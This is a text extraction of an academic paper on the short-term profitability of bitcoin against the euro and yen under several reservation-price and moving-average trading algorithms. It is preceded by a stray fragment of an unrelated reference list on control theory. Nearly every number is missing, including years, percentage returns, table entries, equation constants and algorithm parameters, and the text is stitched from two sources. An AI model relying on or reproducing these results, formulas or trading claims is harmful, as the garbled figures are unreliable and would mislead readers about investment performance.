, pp. - , aug. [ ] e. cruz-zavala, j.a. moreno, and l.m. fridman, “uniform robust exact differentiator,” ieee trans. autom. control, vol. , no. , pp. - , nov. [ ] z. y. zuo, “non-singular fixed-time terminal sliding mode control of non-linear systems,” iet contr. theory appl., vol. , no. , pp. - , apr. [ ] junkang ni, ling liu, member, ieee, chongxin liu, xiaoyu hu and shilei li ieee transactions on circuits and systems-ii: express briefs [ ] b xu.composite learning finite-time control with application to quadrotors.ieee transactions on systems man & cybernetics systems. , pp( ): - . submitted september accepted november published february corresponding author iftikhar ahmad, ia@uetpeshawar.edu.pk academic editor ana reyes-menendez additional information and declarations can be found on page doi . /peerj-cs. copyright ahmad et al. distributed under creative commons cc-by . open access using algorithmic trading to analyze short term profitability of bitcoin iftikhar ahmad , muhammad ovais ahmad , , mohammed a. alqarni , abdulwahab ali almazroi and muhammad imran khan khalil department of computer science and information technology, university of engineering & technology peshawar, peshawar, pakistan department of mathematics and computer science, karlstad university, karlstad, sweden m s research unit, university of oulu, oulu, finland university of jeddah, college of computing and information technology at khulais, department of infor- mation technology, jeddah, saudi arabia university of jeddah, college of computer science and engineering, department of software engineering, jeddah, saudi arabia abstract cryptocurrencies such as bitcoin (btc) have seen a surge in value in the recent past and appeared as a useful investment opportunity for traders. however, their short term profitability using algorithmic trading strategies remains unanswered. in this work, we focus on the short term profitability of btc against the euro and the yen for an eight- year period using seven trading algorithms over trading periods of length and days. we use the classical buy and hold (bh) as a benchmark strategy. rather surprisingly, we found that on average, the yen is more profitable than btc and the euro; however the answer also depends on the choice of algorithm. reservation price algorithms result in . % and % of average returns over and days respectively which is the highest for all the algorithms for the three assets. for btc, all algorithms outperform the bh strategy. we also analyze the effect of transaction fee on the profitability of algorithms for btc and observe that for trading period of length no trading strategy is profitable for btc. for trading period of length , only two strategies are profitable. subjects algorithms and analysis of algorithms, data science keywords algorithmic trading, bitcoin, cryptocurrencies introduction cryptocurrencies have seen a surge in the recent past. researchers and investors alike have focused on the growth and evolution of cryptocurrencies like bitcoin (btc), etherum, and litecoin etc. moore ( ) attributed three main factors that contributed towards the rise and adaptation of bitcoins. first, higher profit margins, maintained by credit card agencies for using their platforms has resulted in dis-satisfied customers. the customers are thus lured to use btc, which promises extremely low transaction fee. second, the anonymity that is offered by the bitcoins. bitcoins offer the possibility of conducting transactions using pseudonyms and thus omitting the need of using real names. third is the decentralization of the bitcoin that protects against inflation. over time, btc has become one of the choice currencies for online payment and beside others is accepted by tech-giants like amazon, apple, microsoft, and paypal etc. the introduction of cryptocurrencies provided a new how to cite this article ahmad i, ahmad mo, alqarni ma, almazroi aa, khalil mik. . using algorithmic trading to analyze short term profitability of bitcoin. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:ia@uetpeshawar.edu.pk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. investment domain for the investors, and became a credible investment vehicle (brière, oosterlinck & szafarz, ). bitcoin was introduced by satoshi nakamoto in (nakamoto, ). the inventor satoshi nakamoto is a pseudonym and the real identity of the person is not known to the world. bitcoin is a digital currency, i.e., unlike fiat currencies such as dollar, and euro etc., it does not have any physical denomination, and is present only in digital form. beside similarities, such as the price regulation based on demand and supply, there are some key differences between fiat and crypto currencies like btc. for instance, btc has no centralized authority (like the federal reserve) that controls the supply, i.e., btc and by extension all cryptocurrencies are decentralized by nature. the value of a fiat currency is generally dependent on factors such as inflation rate in a country, the interest rates, balance between import and export and monetary policy. in contrast, the value of btc can be determined by several factors such as transactional demand, media speculation, buzz around the technology, and acceptability etc (nguyen, de bodisco & thaver, ; wang & vergne, ). other differentiating aspects include legality, tangibility, and storage. the underlying technology of btc is blockchain. in its simplest form, a blockchain is a distributed append-only ledger formed by the collection of blocks. the append-only nature of the ledger means that transactions once recorded are tempered-proof and cannot be changed/modified in any form. this property is achieved with the help of cryptographic hash functions (narayanan et al., ). the bitcoin eco-system is based on peer-to-peer network where a large number of computational nodes are connected (not necessarily directly). the peer-to-peer network omits the need of centralized system, instead it uses the concept of ‘‘proof-of-work’’ to validate transactions. for a detailed description of btc, its underlying technology and applications, the reader is referred to narayanan et al. ( ). algorithmic trading is an important tool used by investors in financial trading markets (ahmad & schmidt, ). it facilitates investors in investing their wealth in various assets (currencies, bonds, stock shares etc.) by automating the decision making process. a number of algorithms are proposed in the literature for algorithmic trading (iqbal & ahmad, ; mohr, ahmad & schmidt, ; ahmad & schmidt, ; el-yaniv et al., ). the problem is addressed in a wide variety of domains including computer science (kao & tate, ; el-yaniv et al., ; mohr, ahmad & schmidt, ), operations research (schroeder, dochow & schmidt, ), economics and finance (coakley, marzano & nankervis, ; hsu, hsu & kuan, ). these algorithms are based on various assumptions and are designed to optimize a variety of objective functions such as minimizing competitive ratio (mohr, ahmad & schmidt, ). algorithmic trading and technical analysis are also important tools to investigate the market behavior and assess its profitability in the short and long term scenarios (ahmad & schmidt, ; coakley, marzano & nankervis, ). despite the debate in the literature questioning the effectiveness of technical analysis, there is a plethora of research work based on technical analysis (coakley, marzano & nankervis, ; hsu, hsu & kuan, ; menkhoff & taylor, ). the variety of studies validated the usefulness of technical analysis and its wide spread applicability. however, to the best of our knowledge, there is no work to evaluate the short term profitability of btc using algorithmic trading ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. and technical analysis. we investigate the short term profitability of btc against two other major currencies euro and yen. more specifically, we consider daily exchange rates of dollar–btc, dollar–euro, and dollar-yen from st jan to st dec . we investigate the short term profitability ( and days) as it is a common observation that in the long term btc has observed significant price movement and is highly profitable. we consider two categories of algorithms namely reservation price algorithms and moving average based algorithms and consider buy and hold as a benchmark strategy. our findings are based on the geometric average period return, the effect of transaction fee, the number of buy and sell transactions, the number of completed transactions, and the number of profitable vs. non-profitable transactions. using buy and hold strategy as our benchmark, we compare the geometric average period returns of the seven strategies with buy and hold. rather surprisingly, we found that in short term the yen is more profitable than btc and euro; however the answer also depends on the choice of algorithm. reservation price algorithms result in . % and % of average returns over and days respectively, which is the highest for all algorithms for the three assets. for btc, all algorithms outperform the bh strategy. after introducing a transaction fee of %, we observe that for the trading period of length no trading strategy is profitable for btc, whereas for trading period of length , only two strategies are profitable. it is important to mention that we do not consider machine learning techniques but instead focus on algorithmic trading strategies which do not rely on past trends and patterns, thus do not need future to follow the patterns of the past. machine learning based algorithms are presented in the literature, the reader is referred to uras et al. ( ), alessandretti et al. ( ) and zbikowski ( ) rest of the paper is organized as follows; in ‘literature review’, we briefly present literature review on the use of experimental evaluation of trading algorithms. in ‘research questions and data set’, we present a set of research questions and the methodology for the extraction of data set. in ‘experimental setup and methodology’, we describe the set of algorithms, followed by the description of the evaluation criterion. results are presented in ‘results and discussions’, whereas ‘conclusion’ presents conclusion, and directions for future work. literature review experimental evaluation of trading strategies is an established area of research in computer science (iqbal, ahmad & schmidt, ; ahmad & schmidt, ; mohr, ahmad & schmidt, ), and computational finance (brock, lakonishok & lebaron, ; coakley, marzano & nankervis, ). ever since the seminal work of brock, lakonishok & lebaron ( ) there is a considerable literature devoted to the study of algorithmic trading strategies. the strategies are investigated from different perspectives and for various markets around the world. in the following, we present a brief literature review of the work based on experimental analysis of trading algorithms. iqbal, ahmad & schmidt ( ) performed an experimental evaluation of dax to answer the question ‘‘can online trading algorithms beat the market?’’. the authors ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. considered a number of trading algorithms, and compared their performance with classical buy and hold (bh) algorithm over trading periods of various length. they concluded that trading algorithms can beat the market, i.e., a trading algorithm can achieve a better return (profit) than bh algorithm. ahmad & schmidt ( ) presented an extensive experimental evaluation of trading algorithms for uni-directional conversion problem (see mohr, ahmad & schmidt ( ) for a definition of uni-directional conversion problem). the authors considered two data sets dax and s&p over a period of years ( – , and compared the performance of various algorithms using average competitive ratio. unlike, iqbal, ahmad & schmidt ( ), ahmad & schmidt ( ) used bootstrapping to avoid data snooping bias. coakley, marzano & nankervis ( ) performed a comprehensive analysis of various trading rules for currencies over a period of years. authors reported evidence of profitability for rules based on classical moving average as well as rules based on bollinger bands and relative strength index. jiang, tong & song ( ) investigated the profitability of trading rules in chinese stock market. the authors used years daily data from chinese aggregate market return and confirmed the profitability of trading rules even in the presence of transaction costs. strobel & auer ( ) analyzed the diminishing predictive power of fundamental variables and seasonal effects over time. they considered variable length moving average (vlma) rules introduced by brock, lakonishok & lebaron ( ), and using data set covering to concluded that vlma rules have lost the predictive ability. chang, jong & wang ( ) used vlma rules to taiwanese stock exchange (twse) and computed excess returns to buy and hold (bh) strategy. the objective of the work was to evaluate the effectiveness of vlma rules against bh. the results confirmed the superiority of vlma rules against bh. the novelty of the work lies in the application of vlma rules to all individual stock listed on twse. hsu, taylor & wang ( ) investigated the profitability of technical trading rules in the forex market by analyzing currencies over a period of years. it is argued that there is a significant evidence of the profitability of technical trading rules for some periods. likewise, the profitability variations are consistent with the adaptive market hypothesis. fang, jacobsen & qin ( ) used the technical trading rules of brock, lakonishok & lebaron ( ) and out-of-sample tests based on fresh data. they inferred that there is no conclusive evidence to support the predictive ability of these strategies. however, they attributed the lack of predictive ability to potential bias rather than efficient market hypothesis. despite the plethora of work dedicated to analyze the profitability of various trading strategies and markets, to the best of our knowledge there is no work that compares the profitability of bitcoin with various other currencies, and to evaluate the performance of various algorithms on bitcoin. research questions and data set research questions we formulate a set of research questions (rq), which essentially provide a base for the data analysis. the main objectives of the research questions are to identify the most profitable ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. asset, the most appropriate (profitable) algorithm for various assets, and to analyze the effect of transaction cost on the profitability of various algorithms. rq . which asset is the most profitable in terms of geometric average period returns? rq . which strategy is the most profitable for each of the assets? rq . how the number of buy and sell signals vary for btc? rq . what are the number of positive and negative returned transactions for btc? rq . how the transaction fee effects the profitability of algorithms? note that the research questions are not arbitrarily but are instead rooted in the literature. for instance, rq is based on hsu, taylor & wang ( ) who used japanese yen, german mark/euro, u.k. pound, and swiss franc as base currency in their study and evaluated the profitability of technical trading rules. likewise, rq is variant of research question posed in abbey & doukas ( ). in abbey & doukas ( ) the authors examined if technical trading rules can be profitable for individual traders. in the similar manner, rq is studied by a number of researchers including hsu, taylor & wang ( ) and ahmad & schmidt ( ). data we consider the daily closing prices of the following currencies against dollar; i bitcoin (btc) ii euro iii yen a single data point represents the amount of currency that can be purchased by spending us. the btc data is obtained from coindesk website (http://www.coindesk.com) for a period of years starting from jan to dec . the main reason for the selection of the data set is based on the availability of the data. on many websites such as coindesk, usd-btc data is only available from july , therefore, we select the starting date to be jan , and in the process data set consists of complete years. euro and yen data is obtained from yahoo! finance (http://finance.yahoo.com). table reports various statistics for the data. for the sake of comparison, we take a holistic view of the whole data set by reporting the statistics for the years ( jan – dec ). experimental setup and methodology trading algorithms a variety of trading algorithms are proposed in the literature (mohr, ahmad & schmidt, ; coakley, marzano & nankervis, ). in the following we describe a selected set of algorithms that are used in our study. the motivation behind the selection of the algorithms from the literature is rooted in the performance of the algorithms. studies (ahmad & schmidt, ; iqbal, ahmad & schmidt, ; iqbal, ahmad & shah, ) have shown that reservation algorithm of el-yaniv et al. ( ) and iqbal, ahmad & shah ( ) are the best performing algorithms. further, in order to make the comparison meaningful, two widely used techniques from finance namely variable length moving average, and fixed length moving average are also considered. ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.coindesk.com) http://finance.yahoo.com http://dx.doi.org/ . /peerj-cs. table summary statistics of the dataset, σ =standard deviation, γ =skewness, k =kurtosis, ρ(k)=kth order correlation. asset bitcoin euro yen observations minimum . . . maximum . . . mean . . . σ . . . γ . . − . std error of γ . . . k . − . − . std error of k . . . ρ( ) . . . ρ( ) . . . ρ( ) . . . ρ( ) . . . ρ( ) . . . ρ( ) . . . ρ( ) . . . reservation price algorithms reservation price algorithm calculates a threshold price and generates a buy signal when the offered exchange rate is less than or equal to the threshold. a sell signal is generated when the price is at least threshold (iqbal, ahmad & schmidt, ; iqbal, ahmad & shah, ; kao & tate, ). a number of reservation price algorithms are presented in the literature (mohr, ahmad & schmidt, ; kao & tate, ; iqbal, ahmad & shah, ; el-yaniv et al., ). in the following we present the selected set of reservation price algorithms considered for our study. el-yaniv et al. ( ) assumed a priori information about the lower (minimum possible price m) and upper (maximum possible price m) bound of prices, and presented a reservation price algorithm. let et be the current exchange price. algorithm provides formal description for el-yaniv reservation price algorithm for generating buy and sell signals respectively. iqbal, ahmad & shah ( ) presented a modified version of the reservation price policy of el-yaniv et al. ( ). the authors critiqued the assumption of fixed values of m and m and argued that inter-day price fluctuation is not arbitrary but is instead governed by inter-day price fluctuation function as shown in eq ( ). ( −γ)et− ≤et ≤( +γ)et− ( ) note that et is the exchange rate offered on day t, and γ ∈ , . the formal description of algorithm is given in algorithm . for detailed working of the algorithm, the reader is referred to iqbal, ahmad & shah ( ). kao & tate ( ) presented a reservation price algorithm based on the perceived rank of the offered exchange rate. the perceived exchange rank is calculated based on the current ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm reservation price algorithm (rp) require: et,m,m : calculate reservation price e∗= √ mm : if et ≤e∗ then : generate a buy signal : end if : if et >e∗ then : generate a sell signal : end if : generate a sell signal on the last trading day if there is an open buy signal even if the criterion for sell signal is not met. algorithm reservation price algorithm rp∗ require: m, m,γ,t : set m =m,m =m : for t= to t do : a new exchange rate et is observed. : compute achievable lower bound mt : mt =max{mt− ,et ( −γ)t−t} : compute achievable upper bound mt : mt =min{mt− ,et ( +γ)t−t} : calculate new reservation price e∗t = √ mt mt : if et ≤e∗t then : generate a buy signal : end if : if et >e∗t then : generate a sell signal : end if : end for : generate a sell signal on the last trading day if there is an open buy signal even if the criterion for sell signal is not met. rank xt of the offered exchange rate et in all the exchange prices observed so far. the formal algorithm is presented in algorithm . t represents the number of days in a trading period, lt (t) and ht (t) are the thresholds for buy and sell signals respectively and are computed as shown in eqs. ( ) and ( ) respectively; lt (t)=   : t =t⌊ t+ t+ (rt (t+ )−pt (t+ )) ⌋ : t <t ( ) ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm reservation price algorithm (kt) require: et,lt (t),ht (t) calculate lt (t) calculate ht (t) generate a buy signal at exchange rate et if xt ≤lt (t) generate a sell signal at exchange rate et if xt ≥ht (t) generate a sell signal on the last trading day if there is an open buy signal even if the criterion for sell signal is not met. note that pt (t) is the expected difference between the buy and sell prices if the optimal strategy is followed at t, and is calculated as shown in eq. ( ). pt (t)=   : t =t pt (t+ )+ lt (t) t ( rt (t+ )−pt (t+ )− t+ t+ lt (t)+ ) : t <t ( ) ht (t)= ⌈ t+ t+ rt (t+ ) ⌉ ( ) note that rt is the expected final rank of et for selling, if an optimal strategy is followed starting from time t, and is calculated as given in eq. ( ). rt (t)= ht (t)− t ( rt (t+ )− t+ (t+ ) ht (t) ) + t+ . ( ) moving average based rules moving average (ma) rule is the simplest and popular technical analysis trading rule. the basic idea of ma based rules is to generate buy and sell signals based on the short vs long-term moving averages. more specifically, a buy signal is generated when the short term moving average cuts the long term moving average from below. on the contrary, a sell signal is generated when the short-term moving average cuts the long-term moving average from above. however, in a market the crossing between short-term and long-term moving averages can occur on multiple instances in a short period, resulting in a large number of buy and sell signals (zhu et al., ). the resulting large number of signals are hardly profitable and can force a large transaction fee as well. to avoid this, a minimum threshold called band is introduced. the band introduces a specific percentage difference between the short and long term moving averages in order to generate buy and sell signals. in the literature two variants of the moving averages, called variable length moving average (vlma) and fixed length moving average (flma) are used (brock, lakonishok & lebaron, ; gunasekarage & power, ; zhu et al., ). let as be the short term moving average, al be the long term moving average, and b the band value. algorithm describes variable length moving average strategy for buy and sell signals. in vlma a buy signal is generated when the short term moving average cuts the long term moving average (taking into account the band value) from below, i.e., as >( +b)al. ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithm variable length moving average algorithm require: as,al,b : if as >( +b)al then : generate a buy signal : end if : if as <( −b)al then : generate a sell signal : end if : generate a sell signal on the last trading day if there is an open buy signal even if the criterion for sell signal is not met. likewise, vlma generates a sell signal when as < ( −b)al. a rule is represented by the combination of three values s (length of short-term moving average), l (length of long-term moving average), b (band). for instance, vlma( , , . ) represents a rule where short term average is taken over a period of days, long term over a period of days, and the band value is %. flma works on the same principle as stated in algorithm . however, flma differs from the vlma by introducing a holding period, i.e., once a signal is generated then the position must be held for a fixed number of days. any signal generated during the holding period is ignored. buy and hold strategy buy and hold (bh) is widely used in the literature as a benchmark strategy (mohr, ahmad & schmidt, ; chang, jong & wang, ; baur et al., ), and is therefore used in our study as well. in bh an investor executes the buy transaction on the first day of the investment period and holds the position until the last day t . on the last day, a sell transaction is executed to complete the trading. the formal description of buy and sell signals of bh algorithm is given in algorithm . algorithm buy and hold (bh) require: e ,et : buy on the first offered exchange rate e : sell on the last offered exchange rate et we test the profitability of the algorithms for various parameters and for various durations. we consider short term moving averages over and days, long term moving averages over , and days, and band values . and . (brock, lakonishok & lebaron, ; fang, jacobsen & qin, ). thus we produce a total of trading rules, each for vlma and flma. likewise, we consider and days durations for algorithms , , and . thus we have a total of variants of algorithms to evaluate. table presents a summary of the selected algorithms and their variants. evaluation criterion we use geometric average trading period return (gpr) as our evaluation criterion. gpr is used as an evaluation criterion in a number of works such as schmidt, mohr & kersch ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table summary of the selected algorithms and their variants. s.no algorithm description vlma( , , . ) vlma algorithm with s,l,b values as , , . vlma( , , . ) vlma algorithm with s,l,b values as , , . flma( , , . ) flma algorithm with s,l,b values as , , . flma( , , . ) flma algorithm with s,l,b values as , , . rp( ) reservation price algorithm (rp) (el-yaniv et al., ) applied over days rp∗( ) update reservation price algorithm (rp∗) (iqbal, ahmad & shah, ) applied over days kt( ) reservation price algorithm (kt) (kao & tate, ) applied over days bh( ) buy and hold algorithm applied over days vlma( , , . ) vlma algorithm with s,l,b values as , , . vlma( , , . ) vlma algorithm with s,l,b values as , , . flma( , , . ) flma algorithm with s,l,b values as , , . flma( , , . ) flma algorithm with s,l,b values as , , . rp( ) reservation price algorithm (rp) (el-yaniv et al., ) applied over days rp∗( ) update reservation price algorithm (rp∗) (iqbal, ahmad & shah, ) applied over days kt( ) reservation price algorithm (kt) (kao & tate, ) applied over days bh( ) buy and hold algorithm applied over days ( ) and iqbal, ahmad & schmidt ( ). let dj be the initial amount of dollars at the start of a trading period j, and djt be the final amount of dollars at the end of the trading period j. let, rj be the return of the jth trading period, then rj =d j t/d j . assuming that there are p trading periods (or trades), we define the geometric average trading period return gpr(p) as; gpr(p)= ( p∏ i= ri ) /p ( ) initially we do not consider any transaction fee and report our findings based on zero transaction fee. in ‘how the transaction fee effect the profitablity of algorithms?’, we assess the impact of the transaction fee on the returns by introducing various values of transaction fees. the transaction fees are based on coinbase—one of the popular online services dealing in buying, selling and storage of bitcoins. coinbase charges a minimum of . % transaction fee on all transactions. however, the exact value varies based on the mode of payment. for instance, for payment via credit card the transaction fee is . %. we consider a set of transaction fees tf ={ , . , . }. we compare the geometric average period returns of the strategies (see table ). it is also important to mention that returns are only calculated for trading periods when at least one buy transaction is followed by a sell transaction. for situations, where only buy or only sell signals are generated, no returns are taken into account. ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table geometric average trading period returns (gpr) of trading strategies. strategy bitcoin euro yen vlma( , , . ) . . . vlma( , , . ) . . . flma( , , . ) . . . flma( , , . ) . . . rp( ) . . . rp∗( ) . . . kt( ) . . . bh( ) . . . vlma( , , . ) . . . vlma( , , . ) . . . flma( , , . ) . . . flma( , , . ) . . . rp( ) . . . rp∗( ) . . . kt( ) . . . bh( ) . . . average gpr . . . results and discussions in the following, we present our results from various perspectives such as the geometric average trading period returns, the number of buy/sell signals generated and the impact of the transaction fee. which asset is the most profitable in terms of geometric average period return? we calculate geometric average trading period return for each trading rule based on eq. ( ) and report our findings as shown in table . it must be noted that we do not consider any transaction fee in this case. the effect of the transaction fee is discussed later in ‘how the transaction fee effect the profitablity of algorithms?’ it can be seen from the resultant table that the average gpr of the selected assets are . , . , and . for btc, euro and yen respectively. although the difference between gpr is not significant, yen achieved a higher return than btc, and euro. a further analysis of the data reflects that the returns are strategy dependent as well. for instance, rp∗( ) achieved an gpr of . over btc which is the highest returns among all the assets/strategies. another interesting observation is the number of resultant positive and negative returns. note that an gpr of at least is termed as a positive return. for btc, out of strategies, are positive. for euro and yen, the corresponding number of positive returns strategies are and respectively. comparing the performance of reservation price algorithms (rp, rp∗, kt), and moving average based strategies (vlma, flma) with bh, we found that for btc, the returns of all algorithms are superior than corresponding bh strategies. the same trend is observed ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table highest gpr achieved for the assets. asset trading period gpr algorithm btc . rp∗ btc . rp∗ euro . vlma( , , . ) euro . vlma( , , . ) yen . flma( , , . ) yen . flma( , , . ) for euro except for kt( ) which is inferior to bh( ). all algorithms outperform bh on yen as well, except kt . which strategy is the most profitable for each of the assets? to answer the question, we analyze table , and identify the best performing algorithm for each asset. we also consider the trading period length, and summarize the results in table . we observed that rp∗ is the best algorithm for btc achieving a gpr of . and . for trading period of length and respectively. for euro, the corresponding algorithms are vlma( , , . ) and vlma( , , . ) resulting in an average gpr of . and . respectively. flma( , , . ) and flma( , , . ) are the best performing algorithms for yen with average gpr of . and . respectively. it is interesting to note that for each asset, a unique algorithm is adjudicated as the best performing algorithm. further, analysis reveals that kt and bh are the worst performing algorithms for all the three data sets. for btc, the two algorithms’ returns are negative (< ). for euro, the returns of kt and bh are positive (though worst among all), and for yen the returns are positive except for kt( ) which is marginally less than . on average, vlma( , , . ) is the best performing algorithm over all asset by achieving an average gpr of . which is closely followed by flma( , , . ). it is interesting to point out that although rp and rp∗ assumes apriori information about the lower and upper bounds of future exchange rates, their average performance is inferior to that of vlma and flma. in order to ensure that the performance of algorithms on btc is not an anomaly, a statistical t-test (paired sample t-test) was performed with confidence level of % (p≤ . ). the tests were performed on the returns of algorithms for btc considering and days trading duration. tables and summarizes the results of paired t-test for the returns of btc on various algorithms for and days trading periods. recall from table that rp∗ is the best performing algorithm for btc. table confirms that with % confidence the improved performance of rp∗ over all algorithms (except vlma( , , . ), and flma( , , . )) is not by chance. for vlma( , , . ), and flma( , , . ) the confidence level is still significant ( % and %). other than rp∗, and rp no other algorithm exhibits a significant confidence in the returns over btc. however, except for flma( , , . ) and kt( ) all other algorithms have shown the potential to beat the market, i.e., the returns are better (and statistically significant) than bh strategy. for days trading period, the returns of moving average based strategies ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table paired sample t-test for the returns of btc with confidence interval of % ( days trading period). algorithms vlma( , , . ) flma( , , . ) flma( , , . ) rp( ) rp∗( ) kt( ) bh( ) vlma( , , . ) . . . . . . . vlma( , , . ) – . . . . . . flma( , , . ) – – . . . . . flma( , , . ) – – – . . . . rp( ) – – – – rp∗( ) – – – – – kt( ) – – – – – – . table paired sample t-test for the returns of btc with confidence interval of % ( days trading period). algorithms vlma( , , . ) flma( , , . ) flma( , , . ) rp( ) rp∗( ) kt( ) bh( ) vlma( , , . ) . . . . . . . vlma( , , . ) – . . . . . . flma( , , . ) – – . . . . . flma( , , . ) – – – . . . . rp( ) – – – – . rp∗( ) – – – – – kt( ) – – – – – – . are statistically significant than bh only (see table ), whereas rp∗ achieves statistically significant returns than rp, kt , and bh only. how the number of buy and sell signals vary for btc? we record the number of buy and sell signals, as well as the number of completed transactions. a transaction is completed when for a buy signal the corresponding sell transaction occurs. figure summarizes the number of buy, sell and completed transactions. we observed that considering days trading period for btc, vlma and flma based strategies resulted in % completed transactions. vlma generates % more buy and sell signals than flma. this is logical as vlma based strategies do not have any holding period and are free to generate a signal if the corresponding criterion is met. for reservation price algorithms, the number of completed transactions are in the range of − %. buy and hold has the highest number of completed transactions as it does not generate buy and sell signals based on some predefined criterion, but instead buys on the first trading day and sells on the last trading day irrespective of the offered exchange rate. for trading period of length days, the same trend is observed for vlma and flma based strategies. our analysis of the data reveals that for vlma on average % of the buy transactions remains open whereas the corresponding number for the sell signal is %. likewise, the percentage of open buy and sell signals for flma are % and % only. for reservation price algorithms, the number of completed transactions are reduced to − %. ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. v l m a ( , , . ) v l m a ( , , . ) f l m a ( , , . ) f l m a ( , , . ) r p ( ) r p * ( ) k t ( ) b h ( ) v l m a ( , , . ) v l m a ( , , . ) f l m a ( , , . ) f l m a ( , , . ) r p ( ) r p * ( ) k t ( ) b h ( ) no .o fs ign als /tr an sa cti on a l g o r i t h m s b u y s i g n a l s e l l s i g n a l s c o m p l e t e d t x s figure number of buy and sell signals and complete transactions for btc. full-size doi: . /peerjcs. /fig- what are the number of positive and negative returned transactions for btc? we investigate completed transactions from the perspective of positive vs negative returns for btc. we define a transaction to yield positive returns if the sell price is higher than the buy price, i.e., rj > where rj represents the returns of the trading period j. for days trading period, we observe that the vlma and flma based strategies have higher percentage (> %) of negative returned transactions. for the reservation price policy, kt has more negative transactions (> %) whereas rp and rp∗ have higher positive transactions. rp has . %, and rp∗ has positive returned transactions. bh has % positive returned transactions. the worst rate of positive returned transaction is observed for kt ( %). for trading duration of days, rather surprisingly, the percentage of positive returned transaction increased slightly for vlma, flma and kt , whereas a reduction is observed for rp and rp∗. figure is a graphical summary of the positive and negative returned transaction for btc. how the transaction fee effect the profitablity of algorithms? transaction fee can be a vital factor in the profitability of any trading algorithm. we consider a transaction fee tf ={ %, %, %} and calculate gpr to find the effect on the profitability. figure is a graphical representation of the effect of transaction fee on gpr of algorithms for btc. we observed an average reduction of . % and . % in the gpr of algorithms when transaction fee of % and % are levied. introducing a transaction fee of % reduced the positive returned strategies from to only, which are further reduced to (rp and rp∗) when the transaction fee is increased to %. for euro, the profitability of algorithm is severely reduced from to strategies when the transaction fee of % is introduced. rather interestingly, for yen the introduction of transaction fee reduces ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. v l m a ( , , . ) v l m a ( , , . ) f l m a ( , , . ) f l m a ( , , . ) r p ( ) r p * ( ) k t ( ) b h ( ) v l m a ( , , . ) v l m a ( , , . ) f l m a ( , , . ) f l m a ( , , . ) r p ( ) r p * ( ) k t ( ) b h ( ) pe rce nta ge a l g o r i t h m s n e g a t i v e t x p o s i t i v e t x figure positive vs negative returned transactions. full-size doi: . /peerjcs. /fig- v l m a ( , , . ) v l m a ( , , . ) f l m a ( , , . ) f l m a ( , , . ) r p ( ) r p * ( ) k t ( ) b h ( ) v l m a ( , , . ) v l m a ( , , . ) f l m a ( , , . ) f l m a ( , , . ) r p ( ) r p * ( ) k t ( ) b h ( ) . . . . . . . av era ge p eri od r etu rn a l g o r i t h m s % % % figure the effect of transaction fee on gpr of btc. full-size doi: . /peerjcs. /fig- the number of profitable strategies from to after introduction of % transaction fee. however, there is no change in the number of profitable strategies when the transaction fee is increased to %. for yen, the four profitable strategies are vlma ( , , . ), flma ( , , . ), vlma ( , , . ), flma ( , , . ). this also reflects that for variable length moving average strategies to be profitable the band value is vital. for smaller band values, the strategies might not be profitable. conclusion we evaluated the short term profitability of btc over a set of reservation price and moving average based algorithms against the euro and the yen for a period of years. based on the ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. average gpr, btc seems less profitable venture than the yen; however, a deeper analysis revealed that the answer the profitability is strategy dependent as well. rp∗ achieved an average gpr of % for a trading period of days, which is the maximum return obtained by any trading algorithm among the three assets. this confirmed btc as an attractive investment opportunity for a short term investment. our analysis also revealed that rp and rp∗ are the best performing algorithms on btc, whereas moving average based algorithms return higher profits for the euro and the yen. it is also shown that the selected set of algorithms beat the buy and hold approach except on the yen where the returns of kt are less than that of buy and hold. further, we highlighted that the returns of all the selected algorithms became negative except for rp and rp∗ when a transaction fee of % was introduced. increasing the transaction fee to % resulted in positive returns for rp and rp∗ on days investment horizon. for all other algorithms and their variants the returns were negative for a transaction fee of %. to the best of our knowledge, this study is the first of its kind to evaluate the profitability of btc using a set of trading algorithms and against fiat currencies. future work can include finding an optimized portfolio of fiat and crypto-currencies for short and long term investment. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • iftikhar ahmad conceived and designed the experiments, performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • muhammad ovais ahmad conceived and designed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. • mohammed a. alqarni conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • abdulwahab ali almazroi performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • muhammad imran khan khalil performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data and code can found in the supplementary files. ahmad et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com 